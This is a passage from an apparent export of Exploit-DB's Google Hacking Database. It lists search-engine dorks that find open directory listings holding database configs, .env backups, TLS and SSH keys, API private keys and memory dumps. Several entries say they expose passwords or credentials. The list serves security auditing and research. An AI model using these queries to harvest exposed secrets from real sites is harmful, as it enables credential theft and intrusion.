<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7756</id>
<link>https://www.exploit-db.com/ghdb/7756</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;data*&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;data*&quot;
# Files Containing Juicy Info
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;data*&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;data*&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>5989</id>
<link>https://www.exploit-db.com/ghdb/5989</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;database.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;database.json&quot;
# By using this dork, user names, passwords and database credentials some
times can be found.
# Date: 1/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;database.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;database.json&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7279</id>
<link>https://www.exploit-db.com/ghdb/7279</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;database.py&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;database.py&quot;
# Files Containing Juicy Info
# Date:06/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;database.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;database.py&quot;</querystring>
<edb></edb>
<date>2021-09-22</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>8108</id>
<link>https://www.exploit-db.com/ghdb/8108</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;database.sql&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;database.sql&quot;
# Files Containing Juicy Info
# Date:14/03/2023
# Exploit Author: Prathamesh Pawar</textualDescription>
<query>intitle:&quot;index of&quot; &quot;database.sql&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;database.sql&quot;</querystring>
<edb></edb>
<date>2023-03-14</date>
<author>Prathamesh Pawar</author>
</entry>
<entry>
<id>6200</id>
<link>https://www.exploit-db.com/ghdb/6200</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;database/config&quot;</shortDescription>
<textualDescription># Dock : intitle:&quot;index of&quot; &quot;database/config&quot;
# Description: This dork will find some juicy information about database configuration files - database/config
Author : Ravi Pavan</textualDescription>
<query>intitle:&quot;index of&quot; &quot;database/config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;database/config&quot;</querystring>
<edb></edb>
<date>2020-06-04</date>
<author>Ravi Pavan</author>
</entry>
<entry>
<id>5641</id>
<link>https://www.exploit-db.com/ghdb/5641</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;databases.yml&quot;</shortDescription>
<textualDescription>Files containing password:
intitle:&quot;index of&quot; &quot;databases.yml&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;databases.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;databases.yml&quot;</querystring>
<edb></edb>
<date>2019-11-11</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>6113</id>
<link>https://www.exploit-db.com/ghdb/6113</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db.log&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;db.log&quot;
Description: This google dork lists out sensitive database logs for web
servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.log&quot;</querystring>
<edb></edb>
<date>2020-05-21</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>7965</id>
<link>https://www.exploit-db.com/ghdb/7965</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db.py&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;db.py&quot;
# Files Containing Juicy Info
# Date: 06/07/2022
# Exploit Author: César Hernández Obispo
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.py&quot;</querystring>
<edb></edb>
<date>2022-07-07</date>
<author>César Hernández Obispo</author>
</entry>
<entry>
<id>7030</id>
<link>https://www.exploit-db.com/ghdb/7030</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;db.sqlite3&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;db.sqlite3&quot;
# Files Containing Juicy Info
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;db.sqlite3&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;db.sqlite3&quot;</querystring>
<edb></edb>
<date>2021-07-22</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7707</id>
<link>https://www.exploit-db.com/ghdb/7707</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;Index of&quot; &quot;DCIM/camera&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;Index of&quot; &quot;DCIM/camera&quot;
# Files Containing Juicy Info
# Date:8/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;Index of&quot; &quot;DCIM/camera&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;Index of&quot; &quot;DCIM/camera&quot;</querystring>
<edb></edb>
<date>2021-11-09</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>6033</id>
<link>https://www.exploit-db.com/ghdb/6033</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;debian-security.log&quot;</shortDescription>
<textualDescription>Dork:
intitle:&quot;index of&quot; &quot;debian-security.log&quot;
intitle:&quot;index of&quot; &quot;linux.log&quot;
Description: This google dork lists out the debian security logs for
websites.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;debian-security.log&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;debian-security.log&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>5442</id>
<link>https://www.exploit-db.com/ghdb/5442</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;debian.cnf&quot;</shortDescription>
<textualDescription>Files Containing Password:
intitle:&quot;index of&quot; &quot;debian.cnf&quot;
intitle:&quot;index of&quot; &quot;db.conf&quot;
Reza Abasi(Turku)
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;debian.cnf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;debian.cnf&quot;</querystring>
<edb></edb>
<date>2019-08-26</date>
<author>Reza Abasi</author>
</entry>
<entry>
<id>5537</id>
<link>https://www.exploit-db.com/ghdb/5537</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;debian.conf&quot;</shortDescription>
<textualDescription>*DORK: *intitle:&quot;index of&quot; &quot;ubuntu.conf&quot;
*Author: Paras Arora(PAC Security)*
*Date: 16 september 2019*
*Category:* Ubuntu Conf files
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;debian.conf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;debian.conf&quot;</querystring>
<edb></edb>
<date>2019-09-16</date>
<author>Paras Arora</author>
</entry>
<entry>
<id>7734</id>
<link>https://www.exploit-db.com/ghdb/7734</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;default.asp &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;default.asp &quot;
# Files Containing Juicy Info
# Date:9/11/2021
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;default.asp &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;default.asp &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>8015</id>
<link>https://www.exploit-db.com/ghdb/8015</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;deploy.sh&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;deploy.sh&quot;
# Files Containing Juicy Info
# Date:27/07/2022
# Exploit Author: Yashwant Shastri</textualDescription>
<query>intitle:&quot;index of&quot; &quot;deploy.sh&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;deploy.sh&quot;</querystring>
<edb></edb>
<date>2022-07-27</date>
<author>Yashwant Shastri</author>
</entry>
<entry>
<id>6249</id>
<link>https://www.exploit-db.com/ghdb/6249</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;dev/config&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;dev/config&quot;
Category: Files Containing Juicy Info
Info: This Google Dork lists out config folders/files on web servers
Exploit Author: Mayank Raheja
Thanks! Looking forward to your response.
Regards,
Mayank Raheja
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;dev/config&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;dev/config&quot;</querystring>
<edb></edb>
<date>2020-06-09</date>
<author>Mayank Raheja</author>
</entry>
<entry>
<id>7326</id>
<link>https://www.exploit-db.com/ghdb/7326</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;development.js&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;development.js&quot;
# Files Containing Juicy Info
# Date:26/09/2021
# Exploit Author: Abhinav Anand</textualDescription>
<query>intitle:&quot;index of&quot; &quot;development.js&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;development.js&quot;</querystring>
<edb></edb>
<date>2021-09-29</date>
<author>Abhinav Anand</author>
</entry>
<entry>
<id>7297</id>
<link>https://www.exploit-db.com/ghdb/7297</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;development.py&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;development.py&quot;
# Files Containing Juicy Info
# Date:06/09/2021
# Exploit Author: J. Igor Melo</textualDescription>
<query>intitle:&quot;index of&quot; &quot;development.py&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;development.py&quot;</querystring>
<edb></edb>
<date>2021-09-24</date>
<author>J. Igor Melo</author>
</entry>
<entry>
<id>7685</id>
<link>https://www.exploit-db.com/ghdb/7685</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;dhcp&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;dhcp&quot;
# Files Containing Juicy Info
# Date:6/11/2021
# Exploit Author: Veeresh Appasaheb Patil</textualDescription>
<query>intitle:&quot;index of&quot; &quot;dhcp&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;dhcp&quot;</querystring>
<edb></edb>
<date>2021-11-08</date>
<author>Veeresh Appasaheb Patil</author>
</entry>
<entry>
<id>6079</id>
<link>https://www.exploit-db.com/ghdb/6079</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;dhparams.pem&quot;</shortDescription>
<textualDescription># Google Dork:
intitle:&quot;index of&quot; &quot;dhparams.pem&quot;
intitle:&quot;index of&quot; &quot;bundle.pem&quot;
# Juicy and sensitive information.
# Date: 13/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;dhparams.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;dhparams.pem&quot;</querystring>
<edb></edb>
<date>2020-05-13</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5987</id>
<link>https://www.exploit-db.com/ghdb/5987</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;docker-cloud.yml&quot;</shortDescription>
<textualDescription># Google Dork:
intitle:&quot;index of&quot; &quot;docker-cloud.yml&quot;
intitle:&quot;index of&quot; &quot;docker-compose.dev.yml&quot; OR &quot;docker-compose.prod.yml&quot; OR &quot;docker-compose.test.yml&quot;
# Juicy information and sensitive directories including user names and
passwords.
# Date: 1/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;docker-cloud.yml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;docker-cloud.yml&quot;</querystring>
<edb></edb>
<date>2020-05-01</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>7366</id>
<link>https://www.exploit-db.com/ghdb/7366</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;docker-compose.yaml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;docker-compose.yaml&quot;
# Files Containing Juicy Info
# Date:01/10/2021
# Exploit Author: Suman Das</textualDescription>
<query>intitle:&quot;index of&quot; &quot;docker-compose.yaml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;docker-compose.yaml&quot;</querystring>
<edb></edb>
<date>2021-10-04</date>
<author>Suman Das</author>
</entry>
<entry>
<id>7566</id>
<link>https://www.exploit-db.com/ghdb/7566</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;DOCS-TECH &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;DOCS-TECH &quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;DOCS-TECH &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;DOCS-TECH &quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7757</id>
<link>https://www.exploit-db.com/ghdb/7757</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;document*.pdf&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;document*.pdf&quot;
# Files Containing Juicy Info
# Date:10/11/2021
# Exploit Author: Krishna Agarwal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;document*.pdf&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;document*.pdf&quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Krishna Agarwal</author>
</entry>
<entry>
<id>8251</id>
<link>https://www.exploit-db.com/ghdb/8251</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;domain.txt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;domain.txt&quot;
# Files Containing Juicy Info
# Date: 02/10/2023
# Exploit Ranjeet Jaiswal</textualDescription>
<query>intitle:&quot;index of&quot; &quot;domain.txt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;domain.txt&quot;</querystring>
<edb></edb>
<date>2023-10-02</date>
<author>Ranjeet Jaiswal</author>
</entry>
<entry>
<id>5978</id>
<link>https://www.exploit-db.com/ghdb/5978</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;dovecot.key&quot; OR &quot;dovecot.crt.cache&quot; OR &quot;dovecot.crt&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;dovecot.key&quot; OR &quot;dovecot.crt.cache&quot; OR
&quot;dovecot.crt&quot;
# Juicy information and sensitive directories which in many cases are
restricted. However, there is lots of nice information into
the &quot;dovecot.crt.cache&quot; files.
# Date: 30/04/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;dovecot.key&quot; OR &quot;dovecot.crt.cache&quot; OR &quot;dovecot.crt&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;dovecot.key&quot; OR &quot;dovecot.crt.cache&quot; OR &quot;dovecot.crt&quot;</querystring>
<edb></edb>
<date>2020-04-30</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>8178</id>
<link>https://www.exploit-db.com/ghdb/8178</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;download.php?file=&quot;
# Files Containing Juicy Info
# Date:05/05/2023
# Exploit Author: Praharsh Kumar Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;download.php?file=&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;download.php?file=&quot;</querystring>
<edb></edb>
<date>2023-05-05</date>
<author>Praharsh Kumar Singh</author>
</entry>
<entry>
<id>7748</id>
<link>https://www.exploit-db.com/ghdb/7748</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;dvwssr.dll &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;dvwssr.dll &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;dvwssr.dll &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;dvwssr.dll &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7592</id>
<link>https://www.exploit-db.com/ghdb/7592</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;echo-linux&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;echo-linux&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;echo-linux&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;echo-linux&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5742</id>
<link>https://www.exploit-db.com/ghdb/5742</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;env.bak&quot;</shortDescription>
<textualDescription>Find env backup files.
--
*Hilary Soita.*
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;env.bak&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;env.bak&quot;</querystring>
<edb></edb>
<date>2020-02-20</date>
<author>Hilary Soita</author>
</entry>
<entry>
<id>7559</id>
<link>https://www.exploit-db.com/ghdb/7559</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;extra&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;extra&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;extra&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;extra&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7560</id>
<link>https://www.exploit-db.com/ghdb/7560</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;extranet&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;extranet&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;extranet&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;extranet&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>4019</id>
<link>https://www.exploit-db.com/ghdb/4019</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;fic&quot; &quot;ndx&quot;</shortDescription>
<textualDescription># Exploit Title: intitle:&quot;index of&quot; &quot;fic&quot; &quot;ndx&quot;
# Google Dork: intitle:&quot;index of&quot; &quot;fic&quot; &quot;ndx&quot;
# Date: 10/06/2015
# Exploit Author: Sphearis
This dork allows you to look for Hyperfile databases(.FIC) stored in the
open. You can simply read them in a text editor(You'll see the header and
then the database content in plain text) or you can convert them(to xml,
excel, ...) with free software. In order to convert them, you also need the
linked index file (.NDX) and optional mmo file which are located in the
same directory.
Some Windev/Webdev installations store usernames and other sensitive
information in that kind of file.</textualDescription>
<query>intitle:&quot;index of&quot; &quot;fic&quot; &quot;ndx&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;fic&quot; &quot;ndx&quot;</querystring>
<edb></edb>
<date>2015-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>7593</id>
<link>https://www.exploit-db.com/ghdb/7593</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;filelist.xml&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;filelist.xml&quot;
# Files Containing Juicy Info
# Date:29/10/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;filelist.xml&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;filelist.xml&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7847</id>
<link>https://www.exploit-db.com/ghdb/7847</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;files.pl&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;files.pl&quot;
# Files Containing Juicy Info
# Date:14/06/2022
# Exploit Author: Muhammad Al-Amin</textualDescription>
<query>intitle:&quot;index of&quot; &quot;files.pl&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;files.pl&quot;</querystring>
<edb></edb>
<date>2022-06-14</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7561</id>
<link>https://www.exploit-db.com/ghdb/7561</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;fsi&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;fsi&quot;
# Files Containing Juicy Info
# Date:01/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;fsi&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;fsi&quot;</querystring>
<edb></edb>
<date>2021-11-01</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7581</id>
<link>https://www.exploit-db.com/ghdb/7581</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;ftp.riken</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;ftp.riken
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;ftp.riken</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;ftp.riken</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6062</id>
<link>https://www.exploit-db.com/ghdb/6062</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;fullchain.pem&quot; OR &quot;chain.pem&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;fullchain.pem&quot; OR &quot;chain.pem&quot;
# Juicy and sensitive information.
# Date: 7/05/2020
# Author: Alexandros Pappas
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;fullchain.pem&quot; OR &quot;chain.pem&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;fullchain.pem&quot; OR &quot;chain.pem&quot;</querystring>
<edb></edb>
<date>2020-05-07</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6037</id>
<link>https://www.exploit-db.com/ghdb/6037</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;google-api-private-key.json&quot;</shortDescription>
<textualDescription>Dork: intitle:&quot;index of&quot; &quot;google-api-private-key.json&quot;
Description: This google dork lists out google api private keys in web
servers.
Author: Abhi Chitkara
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;google-api-private-key.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;google-api-private-key.json&quot;</querystring>
<edb></edb>
<date>2020-05-06</date>
<author>Abhi Chitkara</author>
</entry>
<entry>
<id>6886</id>
<link>https://www.exploit-db.com/ghdb/6886</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;google-services.json&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;google-services.json&quot;
# File containing juicy info
# Exploit Author: Dinesh Kumar
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;google-services.json&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;google-services.json&quot;</querystring>
<edb></edb>
<date>2021-04-19</date>
<author>Dinesh Kumar</author>
</entry>
<entry>
<id>7747</id>
<link>https://www.exploit-db.com/ghdb/7747</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;hello.bat &quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;hello.bat &quot;
# Files Containing Juicy Info
# Date:09/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;hello.bat &quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;hello.bat &quot;</querystring>
<edb></edb>
<date>2021-11-10</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>5126</id>
<link>https://www.exploit-db.com/ghdb/5126</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;hiberfil.sys&quot;</shortDescription>
<textualDescription>This file is a copy of the RAM, it will have the same size of the physical
RAM and it will contain all the data and files of the running system before
it hibernates.
Bruno Schmid
https://ch.linkedin.com/in/schmidbruno
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;hiberfil.sys&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;hiberfil.sys&quot;</querystring>
<edb></edb>
<date>2019-02-15</date>
<author>Bruno Schmid</author>
</entry>
<entry>
<id>7573</id>
<link>https://www.exploit-db.com/ghdb/7573</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;htdocs&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;htdocs&quot;
# Files Containing Juicy Info
# Date:2/11/2021
# Exploit Author: Yash Singh</textualDescription>
<query>intitle:&quot;index of&quot; &quot;htdocs&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;htdocs&quot;</querystring>
<edb></edb>
<date>2021-11-02</date>
<author>Yash Singh</author>
</entry>
<entry>
<id>7590</id>
<link>https://www.exploit-db.com/ghdb/7590</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;html-en&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;html-en&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;html-en&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;html-en&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>7591</id>
<link>https://www.exploit-db.com/ghdb/7591</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;html-intro&quot;</shortDescription>
<textualDescription># Google Dork: intitle:&quot;index of&quot; &quot;html-intro&quot;
# Files Containing Juicy Info
# Date:02/11/2021
# Exploit Author: Muhammad Al-Amin
</textualDescription>
<query>intitle:&quot;index of&quot; &quot;html-intro&quot;</query>
<querystring>https://www.google.com/search?q=intitle:&quot;index of&quot; &quot;html-intro&quot;</querystring>
<edb></edb>
<date>2021-11-03</date>
<author>Muhammad Al-Amin</author>
</entry>
<entry>
<id>6322</id>
<link>https://www.exploit-db.com/ghdb/6322</link>
<category>Files Containing Juicy Info</category>
<shortDescription>intitle:&quot;index of&quot; &quot;id_rsa.pub&quot;</shortDescription>
<textualDescription># Dork: intitle:&quot;index of&quot; &quot;id_rsa.pub&quot;
# Author: Sid Joshi
